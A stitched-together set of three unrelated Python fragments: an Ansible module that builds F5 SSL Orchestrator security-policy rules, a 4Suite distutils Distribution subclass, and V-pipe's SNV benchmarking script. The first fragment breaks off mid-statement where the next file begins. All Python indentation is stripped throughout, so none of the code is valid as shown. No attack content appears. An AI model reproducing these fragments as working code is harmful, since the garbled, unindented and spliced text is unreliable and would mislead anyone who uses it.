json_rule_geolocation = {
"type":"Client IP Geolocation",
"options":{
"geolocations":[],
"port":[],
"url":[]
}
}
json_rule_ip_reputation = {
"type":"Client IP Reputation",
"options":{
"category":[],
"reputation":"bad",
"url":[]
}
}
json_rule_subnet_match = {
"type":"Client IP Subnet Match",
"options":{
"subnet":[],
"url":[]
}
}
json_rule_port_match = {
"type":"Client Port Match",
"options":{
"port":[]
}
}
json_rule_L7_protocol = {
"type":"L7 Protocol Lookup",
"options":{
"protocol":[],
"url":[]
}
}
json_rule_ssl_check = {
"type":"SSL Check",
"options":{
"ssl":True,
"url":[]
}
}
json_rule_url_match = {
"type":"URL Branching",
"options":{
"url":[]
}
}
json_rule_client_vlans = {
"type":"Client VLANs",
"options":{
"vlans":[],
"url":[],
"value":[]
}
}
json_rule_server_cert_issuer_dn = {
"type":"Server Certificate (Issuer DN)",
"options":{
"value":[],
"url":[]
}
}
json_rule_server_cert_subject_dn = {
"type":"Server Certificate (Subject DN)",
"options":{
"value":[],
"url":[]
}
}
json_rule_server_cert_san = {
"type":"Server Certificate (SANs)",
"options":{
"value":[],
"url":[]
}
}
json_rule_server_name_tls_clienthello = {
"type":"Server Name (TLS ClientHello)",
"options":{
"value":[],
"url":[]
}
}
class Parameters(AnsibleF5Parameters):
api_map = {}
updatables = []
api_attributes = []
returnables = []
class ApiParameters(Parameters):
pass
class ModuleParameters(Parameters):
global print_output
@property
def name(self):
name = self._values['name']
name = "ssloP_" + name
return name
@property
def policy_type(self):
policy_type = self._values['policyType']
if policy_type is None:
return "outbound"
return policy_type
@property
def traffic_rules(self):
try:
traffic_rules = self._values['trafficRules']
if traffic_rules == None:
return None
return traffic_rules
except:
return None
@property
def default_rule_allow_block(self):
try:
default_rule_allow_block = self._values['defaultRule']['allowBlock']
if default_rule_allow_block == None:
return "allow"
return default_rule_allow_block
except:
return "allow"
@property
def default_rule_tls_intercept(self):
try:
default_rule_tls_intercept = self._values['defaultRule']['tlsIntercept']
if default_rule_tls_intercept == None:
return "bypass"
return default_rule_tls_intercept
except:
return "bypass"
@property
def default_rule_service_chain(self):
try:
default_rule_service_chain = self._values['defaultRule']['serviceChain']
if default_rule_service_chain == None:
return None
return default_rule_service_chain
except:
return None
@property
def server_cert_validation(self):
try:
server_cert_validation = self._values['serverCertValidation']
if server_cert_validation == None:
return False
return server_cert_validation
except:
return False
@property
def proxy_connect_enabled(self):
try:
proxy_connect_enabled = self._values['proxyConnect']['enabled']
if proxy_connect_enabled == None:
return False
return proxy_connect_enabled
except:
return False
@property
def proxy_connect_pool(self):
try:
proxy_connect_pool = self._values['proxyConnect']['pool']
if proxy_connect_pool == None:
return None
return proxy_connect_pool
except:
return None
@property
def mode(self):
mode = self._values['mode']
return mode
class ModuleManager(object):
global print_output
global json_template
global obj_attempts
global min_version
global max_version
def __init__(self, *args, **kwargs):
self.module = kwargs.pop('module', None)
self.client = F5RestClient(**self.module.params)
self.want = ModuleParameters(params=self.module.params)
def getSsloVersion(self):
## use this method to get the SSLO version (first two digits (x.y))
uri = "https://{0}:{1}/mgmt/shared/iapp/installed-packages".format(
self.client.provider['server'],
self.client.provider['server_port']
)
try:
resp = self.client.api.get(uri).json()
for x in resp["items"]:
if x["appName"] == "f5-iappslx-ssl-orchestrator":
tmpversion = x["release"].split(".")
version = tmpversion[0] + "." + tmpversion[1]
return float(version)
break
except:
raise F5ModuleError("SSL Orchestrator package does not appear to be installed. Aborting.")
def ssloGS_global_exists(self):
## use this method to determine if ssloGS_global exists - and if not, create it
uri = "https://{0}:{1}/mgmt/shared/iapp/blocks/".format(
self.client.provider['server'],
self.client.provider['server_port']
)
query = "?$filter=name+eq+'ssloGS_global'"
resp = self.client.api.get(uri + query)
if len(resp.json()["items"]) > 0:
## ssloGS_global exists
return True
else:
## ssloGS_global does not exist - attempt to create it (only if not in output mode)
if self.want.mode != "output":
uri = "https://{0}:{1}/mgmt/shared/iapp/blocks/".format(
self.client.provider['server'],
self.client.provider['server_port']
)
gs = json_template_gs
if self.ssloVersion >= 6.0:
## remove ssloGS_global loggingConfig key for SSLO >= 6.0
del gs["inputProperties"][1]["value"]["loggingConfig"]
## =================================
## 1.0.1 general update: modify version and previousVersion values to match target BIG-IP version
## =================================
gs["inputProperties"][0]["value"]["version"] = self.ssloVersion
gs["inputProperties"][1]["value"]["version"] = self.ssloVersion
gs["inputProperties"][1]["value"]["previousVersion"] = self.ssloVersion
resp = self.client.api.post(uri, json=gs)
try:
response = resp.json()
except ValueError as ex:
raise F5ModuleError(str(ex))
if resp.status not in [200, 201, 202] or 'code' in response and response['code'] not in [200, 201, 202]:
raise F5ModuleError(resp.content)
## get operation id from last request and loop through check
self.operationId = str(response["id"])
attempts = 1
error = ""
while attempts <= obj_attempts:
uri = "https://{0}:{1}/mgmt/shared/iapp/blocks/".format(
self.client.provider['server'],
self.client.provider['server_port']
)
query = "?$filter=id+eq+'{0}'".format(self.operationId)
resp = self.client.api.get(uri + query).json()
try:
if resp["items"][0]["state"] == "BOUND":
return True
break
elif resp["items"][0]["state"] == "ERROR":
error = str(resp["items"][0]["error"])
break
except:
time.sleep(1)
attempts += 1
if error != "":
## delete attempted configuration and raise error
self.deleteOperation(self.operationId)
raise F5ModuleError("Creation error: " + self.operationId + ":" + error)
else:
raise F5ModuleError("Object " + self.want.name + " create/modify operation timeout")
return True
def deleteOperation(self, id):
## use this method to delete an operation that failed
uri = "https://{0}:{1}/mgmt/shared/iapp/blocks/{2}".format(
self.client.provider['server'],
self.client.provider['server_port'],
id
)
resp = self.client.api.delete(uri)
try:
response = resp.json()
except ValueError as ex:
raise F5ModuleError(str(ex))
if resp.status in [200, 201] or 'code' in response and response['code'] in [200, 201]:
return True
else:
return False
def update_json(self, operation):
## use this method to create and return a modified copy of the JSON template
self.config = json_template
## get base name
self.local_name = re.sub('ssloP_', '', self.want.name)
## perform some input validation
## process general json settings for all operations
self.config["inputProperties"][0]["value"]["deploymentName"] = self.want.name
self.config["inputProperties"][0]["value"]["operationType"] = operation
self.config["inputProperties"][1]["value"]["name"] = self.want.name
self.config["inputProperties"][1]["value"]["policyConsumer"]["type"] = self.want.policy_type.capitalize()
self.config["inputProperties"][1]["value"]["policyConsumer"]["subType"] = self.want.policy_type.capitalize()
## =================================
## 1.0.1 general update: modify version and previousVersion values to match target BIG-IP version
## =================================
self.config["inputProperties"][0]["value"]["version"] = self.ssloVersion
self.config["inputProperties"][1]["value"]["version"] = self.ssloVersion
self.config["inputProperties"][1]["value"]["previousVersion"] = self.ssloVersion
## input validation: serverCertStatusCheck minimally requires SSLO 7.0
if self.ssloVersion >= 7.0:
self.config["inputProperties"][1]["value"]["serverCertStatusCheck"] = self.want.server_cert_validation
## process proxyConnect settings
if self.want.proxy_connect_enabled == True:
self.config["inputProperties"][1]["value"]["proxyConfigurations"]["isProxyChainEnabled"] = True
## input validation: if enabled, must include a pool
if self.want.proxy_connect_pool == None:
raise F5ModuleError("ProxyConnect minimally requires a pool.")
else:
self.config["inputProperties"][1]["value"]["proxyConfigurations"]["pool"]["name"] = self.want.proxy_connect_pool
## process traffic rules
if self.want.traffic_rules != None:
for rule in self.want.traffic_rules:
## input validation: must include name and conditions values
if "name" not in rule:
raise F5ModuleError("A policy rule mst minimally contain a name and condition.")
if "conditions" not in rule:
raise F5ModuleError("A policy rule mst minimally contain a name and condition.")
if rule["conditions"][0]["condition"] == "pinnersRule":
## inject the pinners rule (by itself)
ruleset = {}
ruleset["name"] = "Pinners_Rule"
ruleset["operation"] = "AND"
ruleset["mode"] = "edit"
ruleset["index"] = random.randint(1000000000000, 9999999999999)
ruleset["action"] = "allow"
ruleset["actionOptions"] = {}
ruleset["actionOptions"]["ssl"] = "bypass"
ruleset["actionOptions"]["serviceChain"] = ""
ruleset["conditions"] = []
cond = copy.deepcopy(json_rule_ssl_check)
cond["index"] = random.randint(1000000000000, 9999999999999)
ruleset["conditions"].append(cond)
cond = copy.deepcopy(json_rule_category_lookup_sni)
cond["index"] = random.randint(1000000000000, 9999999999999)
cond["options"]["category"].append("Pinners")
ruleset["conditions"].append(cond)
self.config["inputProperties"][1]["value"]["rules"].append(ruleset)
else:
## start building rule object
ruleset = {}
ruleset["name"] = rule["name"]
if "matchType" not in rule:
matchType = "OR"
else:
matchType = rule["matchType"].upper()
ruleset["operation"] = matchType
ruleset["mode"] = "edit"
ruleset["valid"] = True
ruleset["index"] = random.randint(1000000000000, 9999999999999)
if "allowBlock" not in rule:
allowBlock = "allow"
else:
allowBlock = rule["allowBlock"].lower()
ruleset["action"] = allowBlock
if "tlsIntercept" not in rule:
tlsIntercept = "bypass"
else:
tlsIntercept = rule["tlsIntercept"].lower()
ruleset["actionOptions"] = {}
ruleset["actionOptions"]["ssl"] = tlsIntercept
if "serviceChain" not in rule:
serviceChain = ""
else:
serviceChain = rule["serviceChain"]
if rule["serviceChain"] == "":
serviceChain = ""
elif not serviceChain.startswith("ssloSC_"):
serviceChain = "ssloSC_" + serviceChain
ruleset["actionOptions"]["serviceChain"] = serviceChain
ruleset["conditions"] = []
## loop through and process conditions, add to rule object
for condition in rule["conditions"]:
## =================================
## Category Lookup All
## =================================
if condition["condition"] == "categoryLookupAll":
## input validation: policy type requires a "values" key, and contents must be >= 1
if "values" not in condition:
raise F5ModuleError("The Category Lookup All condition requires a 'values' key and at least 1 category.")
try:
count = len(condition["values"])
except:
raise F5ModuleError("The Category Lookup All condition requires a 'values' key and at least 1 category.")
cond = copy.deepcopy(json_rule_category_lookup_all)
cond["index"] = random.randint(1000000000000, 9999999999999)
for value in condition["values"]:
value = re.sub('/Common/', '', value)
value = re.sub('_', ' ', value)
cond["options"]["category"].append(value)
ruleset["conditions"].append(cond)
## =================================
## Category Lookup HTTP Connect
## =================================
elif condition["condition"] == "categoryLookupConnect":
## input validation: policy type requires a "values" key, and contents must be >= 1
if "values" not in condition:
raise F5ModuleError("The Category Lookup Connect condition requires a 'values' key and at least 1 category.")
try:
count = len(condition["values"])
except:
raise F5ModuleError("The Category Lookup Connect condition requires a 'values' key and at least 1 category.")
cond = copy.deepcopy(json_rule_category_lookup_connect)
cond["index"] = random.randint(1000000000000, 9999999999999)
for value in condition["values"]:
value = re.sub('/Common/', '', value)
value = re.sub('_', ' ', value)
cond["options"]["category"].append(value)
ruleset["conditions"].append(cond)
## =================================
## Category Lookup SNI
## =================================
elif condition["condition"] == | |
import sys, os, warnings, email
from types import ClassType, ListType
from distutils import command, filelist, version
from distutils.cmd import Command
from distutils.core import Distribution, gen_usage, DEBUG
from distutils.errors import *
from distutils.fancy_getopt import FancyGetopt, wrap_text
try:
from distutils import log
except ImportError:
# Python 2.2; create an instance that has the module interface but acts
# like the announce() methods in 2.2.
class Log:
verbose = 1
def log(self, level, msg):
if self.verbose >= level:
print msg
sys.stdout.flush()
def set_verbosity(self, verbose):
self.verbose = verbose
log = Log()
else:
if sys.version < '2.5':
def _log(self, level, msg, args):
if level >= self.threshold:
if args:
msg %= args
print msg
sys.stdout.flush()
return
log.Log._log = _log
del _log
from Ft.Lib import Terminfo
from Ft.Lib.DistExt import Version
# Our new Distribution class
class Dist(Distribution):
"""
An enhanced version of core Distutils' Distribution class.
Currently supported features, for *all* Python (2.2+) versions:
(from Python 2.3+)
download_url, classifiers - PEP 314 metadata fields
(from Python 2.5+)
install_egg_info command - for setuptools
requires, provides, obsoletes - PEP 314 metadata fields
(only available in 4Suite)
requires_python - [PEP 345] a list of version restrictions for Python
requires_external - [PEP 345] a list of external requirements
command_mapping - maps command names to a module/class name that differs
from the actual command name
"""
# 'command_mapping' maps command names to the module/class names
command_mapping = {
'config' : 'Config',
'build' : 'Build',
'build_py' : 'BuildPy',
'build_ext' : 'BuildExt',
'build_clib' : None,
'build_scripts' : 'BuildScripts',
'build_l10n' : 'BuildL10n', # only in 4Suite
'clean' : None,
'install' : 'Install',
'install_lib' : 'InstallLib',
'install_headers' : None,
'install_scripts' : 'InstallScripts',
'install_data' : 'InstallData',
'install_egg_info' : 'InstallEggInfo', # new in 2.5+
'install_sysconf' : 'InstallSysconf', # only in 4Suite
'install_localstate' : 'InstallLocalState', # only in 4Suite
'install_devel' : 'InstallDevel', # only in 4Suite
#'install_man' : 'InstallMan', # only in 4Suite
'install_text' : 'InstallText', # only in 4Suite
#'install_info' : 'InstallInfo', # only in 4Suite
'install_l10n' : 'InstallL10n', # only in 4Suite
'install_config' : 'InstallConfig', # only in 4Suite
'sdist' : 'SDist',
'register' : None, # new in 2.3+
'bdist' : 'BDist',
'bdist_dumb' : None,
'bdist_rpm' : 'BDistRpm',
'bdist_inno' : 'BDistInno', # only in 4Suite
'bdist_msi' : None, # new in 2.5+
'bdist_egg' : 'BDistEgg',
'upload' : None, # new in 2.5+
'generate' : 'Generate', # only in 4Suite
'generate_bgen' : 'GenerateBisonGen', # only in 4Suite
'generate_l10n' : 'GenerateL10n', # only in 4Suite
}
command_aliases = {
'bdist_wininst' : 'bdist_inno',
}
standard_commands = ['config', 'build', 'clean', 'install', 'sdist',
'register', 'bdist', 'upload', 'generate']
if sys.version < '2.5':
standard_commands.remove('upload')
if sys.version < '2.3':
standard_commands.remove('register')
# 'toplevel_options' describes the command-line options that may be
# supplied to the setup script prior to any actual command.
toplevel_options = []
# PKG-INFO is created for source distributions, so allow "developer"
# friendly features to be enabled/disabled (i.e., install_docs)
source_package = os.path.exists('PKG-INFO')
if not source_package:
toplevel_options.extend([
('source-package', 's',
'run as if from a source dist (developer testing)'),
])
def __init__(self, attrs):
# Add our placeholders for arguments from setup()
self.l10n = []
self.doc_files = []
self.bgen_files = []
self.sysconf_files = []
self.localstate_files = []
self.devel_files = []
# The module where configuration variables are written.
# Used by the 'install_config' command.
self.config_module = None
# File in source tree that represents the software copyright.
# Currently, only used by the 'bdist_inno' command.
self.license_file = None
# 'package' is the name of the subpackage.
self.package = None
# File in source tree that contains the setup attributes for the
# subpackage.
self.package_file = None
self.main_distribution = None
# Used for gathering and validating the files included in a source
# distribution. Used by the 'sdist' command.
self.manifest_templates = []
self.validate_templates = []
# Add support for build_py's 'package_data'. New in Python 2.4+
self.package_data = {}
# 'namespace_packages' is a list of package names whose contents are
# split across multiple distributions.
self.namespace_packages = None
Distribution.__init__(self, attrs)
return
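# A minimal illustrative call (hypothetical project values): the extra keywords
# below map onto the placeholders initialised in __init__ and are consumed by
# the 4Suite-specific commands.
#
#   from distutils.core import setup
#   setup(distclass=Dist,
#         name='Ft.Example',
#         version='1.0',
#         config_module='Ft.Example.__config__',
#         manifest_templates=['include docs/*.txt'],
#         sysconf_files=['etc/example.conf'])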
def get_allfiles(self):
if self._allfiles is None:
# If a "main" distribution exists, use its files to prevent
# unnecessary additional searches.
if self.main_distribution:
self._allfiles = self.main_distribution.get_allfiles()
else:
source_list = filelist.FileList()
source_list.extend(filelist.findall())
# Remove files that don't really belong in the file list.
# Note the leading slash (\) before os.sep substitutions. It is
# needed to prevent regex-escaping when os.sep is '\' (Windows).
exclude_patterns = (
# revision control (CVS client) files
r'\%s?CVS(\.sandboxinfo)?\%s' % (os.sep, os.sep),
r'\.cvsignore$',
r'\.#[^\%s]+$' % os.sep,
# (X)Emacs temporary files
r'\.?#[^\%s]+#$' % os.sep,
# common editor backup files
r'[^\%s]+~$' % os.sep,
# python bytecode files
r'\.py[co]$',
)
for pattern in exclude_patterns:
source_list.exclude_pattern(pattern, is_regex=True)
self._allfiles = source_list.files
return self._allfiles
def get_source_files(self):
source_list = filelist.FileList()
source_list.set_allfiles(self.get_allfiles())
# Add the files used to create the Distribution
source_list.append(self.script_name)
if os.path.exists('setup.cfg'):
source_list.append('setup.cfg')
if self.package_file:
source_list.append(self.package_file)
# Get the source files from the command groups
for cmd_name in ('generate', 'build', 'install'):
cmd = self.get_command_obj(cmd_name)
cmd.ensure_finalized()
source_list.extend(cmd.get_source_files())
# 'license_file' is used by bdist_inno
if self.license_file:
source_list.append(self.license_file)
# Add the files not included by the commands
for line in self.manifest_templates:
try:
source_list.process_template_line(line)
except DistutilsTemplateError, msg:
self.warn(str(msg))
# File list now complete -- sort it so that higher-level files
# come first
source_list.sort()
# Remove duplicates from the file list
source_list.remove_duplicates()
return source_list.files
# -- Config file finding/parsing methods ---------------------------
if sys.version < '2.4':
def parse_config_files(self, filenames=None):
Distribution.parse_config_files(self, filenames)
if 'global' in self.command_options:
global_options = self.command_options['global']
boolean_options = {'verbose':1, 'dry_run':1}
boolean_options.update(self.negative_opt)
for opt in global_options:
if opt not in boolean_options:
setattr(self, opt, global_options[opt][1])
return
# -- Command-line parsing methods ----------------------------------
if sys.version < '2.4':
def parse_command_line(self):
"""Parse the setup script's command line, taken from the
'script_args' instance attribute (which defaults to 'sys.argv[1:]'
-- see 'setup()' in core.py). This list is first processed for
"global options" -- options that set attributes of the Distribution
instance. Then, it is alternately scanned for Distutils commands
and options for that command. Each new command terminates the
options for the previous command. The allowed options for a
command are determined by the 'user_options' attribute of the
command class -- thus, we have to be able to load command classes
in order to parse the command line. Any error in that 'options'
attribute raises DistutilsGetoptError; any error on the
command-line raises DistutilsArgError. If no Distutils commands
were found on the command line, raises DistutilsArgError. Return
true if command-line was successfully parsed and we should carry
on with executing commands; false if no errors but we shouldn't
execute commands (currently, this only happens if user asks for
help).
"""
#
# We now have enough information to show the Macintosh dialog
# that allows the user to interactively specify the "command line".
#
toplevel_options = self._get_toplevel_options()
if sys.platform == 'mac':
import EasyDialogs
cmdlist = self.get_command_list()
self.script_args = EasyDialogs.GetArgv(
toplevel_options + self.display_options, cmdlist)
# We have to parse the command line a bit at a time -- global
# options, then the first command, then its options, and so on --
# because each command will be handled by a different class, and
# the options that are valid for a particular class aren't known
# until we have loaded the command class, which doesn't happen
# until we know what the command is.
self.commands = []
parser = FancyGetopt(toplevel_options + self.display_options)
parser.set_negative_aliases(self.negative_opt)
parser.set_aliases({'licence': 'license'})
args = parser.getopt(args=self.script_args, object=self)
option_order = parser.get_option_order()
log.set_verbosity(self.verbose)
# for display options we return immediately
if self.handle_display_options(option_order):
return
while args:
args = self._parse_command_opts(parser, args)
if args is None: # user asked for help (and got it)
return
# Handle the cases of --help as a "global" option, ie.
# "setup.py --help" and "setup.py --help command ...". For the
# former, we show global options (--verbose, --dry-run, etc.)
# and display-only options (--name, --version, etc.); for the
# latter, we omit the display-only options and show help for
# each command listed on the command line.
if self.help:
self._show_help(parser,
display_options=len(self.commands) == 0,
commands=self.commands)
return
# Oops, no commands found
# Source: michalogit/V-pipe -- workflow/scripts/testBench.py
#!/usr/bin/env python3
import os
import argparse
from alignmentIntervals import read_fasta
from Bio import SeqIO
from Bio.SeqRecord import SeqRecord
from Bio.Seq import Seq
import sh
import numpy as np
import pandas as pd
__author__ = "<NAME>"
__license__ = "Apache2.0"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
DBG = True if os.environ.get('DBG') is not None else False
def parse_args():
""" Set up the parsing of command-line arguments """
parser = argparse.ArgumentParser(
description="Benchmark: test",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
requiredNamed = parser.add_argument_group('required named arguments')
requiredNamed.add_argument(
"-f", required=True, default=None, metavar='FASTA',
dest='haplotype_seqs',
help="Fasta file containing either the sequences of the true "
"haplotypes or haplotypes sequences (msa) already reported using "
"the same indexing as the reference/consensus sequence"
)
requiredNamed.add_argument(
"-s", required=True, default=None, metavar='CSV', dest='snvs',
help="File containing called SNVs"
)
requiredNamed.add_argument(
"-N", required=False, default='sample', metavar='STR',
dest='sampleID', help="Patient/sample identifiers"
)
parser.add_argument(
"-m", required=False, default=None, metavar='FASTA',
dest='haplotype_master', type=str,
help="Fasta file containing the sequence with respect to which SNVs "
"were called"
)
parser.add_argument(
"--ref", required=False, default=None, metavar='FASTA',
dest='reference', type=str,
help="Fasta file containing the reference sequence with respect to "
"which reads were aligned"
)
parser.add_argument(
"-d", required=False, default='unif', metavar='str', dest='freq_dstr',
type=str, choices=['unif', 'geom', 'dirichlet', 'cust'],
help="Distribution of haplotype frequencies"
)
parser.add_argument(
"-gr", required=False, default=0.75, metavar='FLOAT', dest='ratio',
type=float, help="Success probability for the geometric distribution"
)
parser.add_argument(
"-df", required=False, default=None, metavar='FASTA',
dest='dirichlet_freqs', type=str,
help="File containing haplotype frequencies"
)
parser.add_argument(
"-ci", required=False, default=None, metavar='chrm:start-end',
dest='coverage_intervals', type=str,
help="File containing coverage intervals"
)
parser.add_argument(
"--no-expansion", required=False, default=False, action='store_true',
dest='no_expansion',
help="Coverage intervals do not correspond to region use to run "
"ShoRAH, but the actual target region"
)
parser.add_argument(
"--caller", required=False, default='shorah', metavar='str',
dest='snv_caller', type=str, choices=['shorah', 'lofreq'],
help="Inidcate if other software different from ShoRAH was used for "
"SNV calling"
)
parser.add_argument(
"-wl", required=False, default=201, metavar='INT', dest='window_len',
type=int,
help="Window length used by ShoRAH to construct overlapping windows"
)
parser.add_argument(
"-ws", required=False, default=3, metavar='INT', dest='window_shift',
type=int,
help="Number of window shifts used by ShoRAH to construct overlapping "
"windows"
)
parser.add_argument(
"-cf", required=False, default=None, metavar='TXT', dest='coverage',
type=str,
help="File to read coverage per window used by ShoRAH, or a "
"tab-separated values file containing coverage per locus"
)
parser.add_argument(
"-ms", required=False, default=False, action='store_true', dest='msa',
help="Indicate if the multiple sequence alignment including "
"reference/consensus sequence should be constructed"
)
parser.add_argument(
"--only-dels", required=False, default=False, action='store_true',
dest='only_deletions',
help="Indicate if only performance based on deletions should reported"
)
parser.add_argument(
"--long-dels", required=False, default=False, action='store_true',
dest='long_deletions',
help="Indicate if deletions should be parsed as multipe-base deletions"
)
parser.add_argument(
"-t", required=False, default=False, action='store_true',
dest='output_true',
help="Indicate if file containing expected SNVs should be reported. "
"Report using 1-based indexing for the position"
)
parser.add_argument(
"-mafft", required=False, default="mafft", metavar='PATH',
dest='mafft', type=str,
help="Path to binaries for the multiple sequence aligner MAFFT"
)
parser.add_argument(
"-of", required=False, default='performance.tsv', metavar='OUTPUT',
dest='outfile', type=str,
help="Output file - file containing expected SNVs"
)
parser.add_argument(
"-od", required=False, default=None, metavar='DIR', dest='outdir',
type=str, help="Output directory for intermediate files"
)
return parser.parse_args()
def frequencies(freq_dstr, num_haplotypes, ratio=0.75, infile=None):
"Compute the expected haplotype frequencies"
if freq_dstr == 'unif':
haplotype_freqs = np.repeat(1 / num_haplotypes, num_haplotypes)
elif freq_dstr == 'geom':
haplotype_freqs = [ratio**(i + 1) for i in range(num_haplotypes)]
haplotype_freqs = np.asarray(haplotype_freqs)
haplotype_freqs = haplotype_freqs / np.sum(haplotype_freqs)
elif freq_dstr == 'dirichlet':
# Read haplotype frequencies from output file
if infile is None:
raise IOError(
"Input file containing haplotype frequencies is expected")
ids, haplotype_freqs = read_fasta(infile)
haplotype_freqs = np.asarray(haplotype_freqs, dtype=float)
return haplotype_freqs
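# Worked example (geometric case), for illustration: with num_haplotypes=3 and
# ratio=0.75 the raw weights are [0.75, 0.5625, 0.421875]; after normalisation
# the expected frequencies are approximately [0.432, 0.324, 0.243].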
def parse_info(df, snvcaller):
if snvcaller == 'shorah':
df_info = pd.DataFrame.from_dict(
[dict([entry.strip().split("=") for entry in line.split(";")])
for line in df["INFO"]]).astype('float')
# We ignore columns with 0-counts to compute the SNV frequency. A zero
# count means that the SNV was not found in the corresponding window.
df_freq = df_info[["Freq1", "Freq2", "Freq3"]].copy()
df_freq[df_freq == 0] = np.nan
df_freq = df_freq.mean(axis=1)
elif snvcaller == 'lofreq':
df["INFO"] = df["INFO"].str.replace("INDEL", "INDEL=1")
df_info = pd.DataFrame.from_dict(
[dict([entry.strip().split("=") for entry in line.split(";")])
for line in df["INFO"]])
df_freq = df_info["AF"]
return df_freq
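# Worked example (ShoRAH), for illustration: for a record with Freq1=0.1,
# Freq2=0 and Freq3=0.3, the zero count is masked to NaN, so the reported
# frequency is the mean of [0.1, 0.3] = 0.2 (the SNV was simply not observed
# in the second window).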
def parse_vcf(snvfile, snvcaller):
# Read VCF file to infer how many lines to skip
skiplines = 0
with open(snvfile, 'r') as infile:
for line in infile:
if not line.startswith('##'):
break
skiplines += 1
try:
df_snvs = pd.read_csv(snvfile, sep="\t", skiprows=skiplines, header=0,
compression=None)
df_snvs = df_snvs.rename(columns={'#CHROM': 'CHROM'})
df_snvs['FREQ'] = parse_info(df_snvs, snvcaller)
except pd.errors.EmptyDataError:
df_snvs = pd.DataFrame()
return df_snvs
def true_snvs(haplotype_master_arr, haplotype_master, haplotype_seqs,
num_haplotypes, haplotype_freqs, long_deletions, alphabet):
"""
Extract expected SNVs using the MSA of the true haplotype sequences and
the reference sequence
"""
# loci = np.arange(haplotype_master_arr.size)
haplotype_idx = np.arange(num_haplotypes)
variants = haplotype_master_arr != haplotype_seqs
df_snvs = pd.DataFrame(columns=('POS', 'REF', 'ALT', 'FREQ', 'HAPLOTYPES'))
num_snvs = 0
for locus in range(haplotype_master_arr.size):
idxs = variants[:, locus]
if np.any(idxs):
var = haplotype_seqs[idxs, locus]
snv_freq = haplotype_freqs[idxs]
if np.sum(idxs) == 1:
df_snvs.loc[num_snvs] = [
locus, haplotype_master_arr[locus].decode(),
var[0].decode(), snv_freq[0],
haplotype_idx[idxs].astype(str)[0]]
num_snvs += 1
else:
for base in alphabet:
idxs_base = var == base
if np.sum(idxs_base) > 0:
hap_aux = ','.join(
haplotype_idx[idxs][idxs_base].astype(str))
df_snvs.loc[num_snvs] = [
locus,
haplotype_master_arr[locus].decode(),
base.decode(), np.sum(snv_freq[idxs_base]),
hap_aux]
num_snvs += 1
df_snvs["POS"] = df_snvs["POS"].astype(int)
if long_deletions:
df_long_dels = pd.DataFrame({
'POS': pd.Series([], dtype='int'),
'REF': pd.Series([], dtype='str'),
'ALT': pd.Series([], dtype='str'),
'FREQ': pd.Series([], dtype='float'),
'HAPLOTYPES': pd.Series([], dtype='str')})
for idx, seq in enumerate(haplotype_seqs):
is_deletion = np.concatenate(([0], seq == b'-', [0]))
intervals = np.where(
np.abs(np.diff(is_deletion)) == 1)[0].reshape(-1, 2)
if intervals.size > 0:
assert (intervals[:, 0] > 0).all(), (
"Deletion reported in the first reference position")
# Deletions are by convention reported at the preceding
# position
dict_dels = {
'POS': intervals[:, 0] - 1,
'REF': [
haplotype_master[(x[0] - 1):x[1]] for x in intervals],
'ALT': [haplotype_master[x[0] - 1] for x in intervals],
'FREQ': [haplotype_freqs[idx]] * intervals.shape[0],
'HAPLOTYPES': [
str(haplotype_idx[idx])] * intervals.shape[0]
}
df_tmp = pd.DataFrame.from_dict(dict_dels)
df_long_dels = pd.concat(
[df_long_dels, df_tmp], ignore_index=True)
# Merge deletions found in different haplotypes together
grpby = df_long_dels.set_index(["POS", "REF", "ALT"])[
["FREQ", "HAPLOTYPES"]].groupby(["POS", "REF", "ALT"])
df_long_dels = pd.concat(
[grpby["FREQ"].sum(),
grpby["HAPLOTYPES"].apply(lambda s: ",".join(s))], axis=1)
df_long_dels.reset_index(inplace=True)
# Drop one-base deletions
del_mask = df_snvs["ALT"].str.startswith('-')
df_snvs = df_snvs[~del_mask]
df_snvs = pd.concat(
[df_snvs, df_long_dels], ignore_index=True)
df_snvs = df_snvs.set_index(["POS", "REF", "ALT"])
df_snvs = df_snvs.sort_index()
df_snvs.reset_index(inplace=True)
return df_snvs
def mafft(infile, outfile, max_iter=1000, thrd=4, mafft='mafft'):
"Use MAFFT to obtain the multiple sequence alignment"
# --nuc sequences are nucleotide
# --localpair pairwise alignments
# --maxiterate number of iterative refinement
cmd = sh.Command(mafft)
cmd = cmd.bake('--nuc')
cmd = cmd.bake('--preservecase')
cmd = cmd.bake('--maxiterate', max_iter)
cmd = cmd.bake('--localpair')
cmd = cmd.bake('--thread', thrd)
cmd = cmd.bake(infile)
cmd = cmd.bake(_out=outfile)
print(cmd)
cmd()
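# With the defaults above, and assuming the 'mafft' binary is on the PATH, the
# assembled command is equivalent to:
#   mafft --nuc --preservecase --maxiterate 1000 --localpair --thread 4 <infile> > <outfile>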
def consecutive(array, stepsize=1):
return np.split(array, np.where(np.diff(array) != stepsize)[0] + 1)
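# Example: consecutive(np.array([1, 2, 3, 7, 8])) splits at the gap and returns
# [array([1, 2, 3]), array([7, 8])].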
def target_snvs(start_region, end_region, start_locus, long_deletions,
end_locus=None):
if long_deletions:
is_contained = (start_locus >= start_region) & \
(end_locus < end_region)
else:
is_contained = (start_locus >= start_region) & \
(start_locus < end_region)
return is_contained
def main():
args = parse_args()
alphabet = ['-', 'A', 'C', 'G', 'T']
alphabet = np.array(alphabet, dtype='c')
# Compute average frequency for SNVs called using ShoRAH
df_snvs = parse_vcf(args.snvs, args.snv_caller)
if df_snvs.empty:
print("No called SNVs")
with open(args.outfile, 'w') as outfile:
outfile.write('ID\tTP\tFP\tFN\tTN\n')
return
# Drop insertions
ins_mask = df_snvs["ALT"].str.len() > 1
df_snvs = df_snvs[~ins_mask]
if args.only_deletions:
# Only look at deletions
# NOTE: temporary work-around while ShoRAH (v1.99.2) is modified to
# report indels complying with the VCF format
if args.snv_caller == 'shorah':
is_deletion = df_snvs["ALT"] == '-'
elif args.snv_caller == 'lofreq':
is_deletion = df_snvs["REF"].str.len() > 1
df_snvs = df_snvs[is_deletion]
# NOTE: once ShoRAH (v1.99.2) is upgraded to report indels complying with
# the VCF format, --long-dels can also be executed and raising an error
# won't be needed
if args.long_deletions and args.snv_caller == 'shorah':
raise ValueError("No current support for --long-dels with ShoRAH")
if df_snvs.empty:
print("No called SNVs")
with open(args.outfile, 'w') as outfile:
outfile.write('ID\tTP\tFP\tFN\tTN\n')
return
if not args.long_deletions:
# Unroll deletions into one-base deletions
del_mask = df_snvs["REF"].str.len() > 1
assert (df_snvs.loc[del_mask, "ALT"] == df_snvs.loc[
del_mask, "REF"].str[0]).all(), (
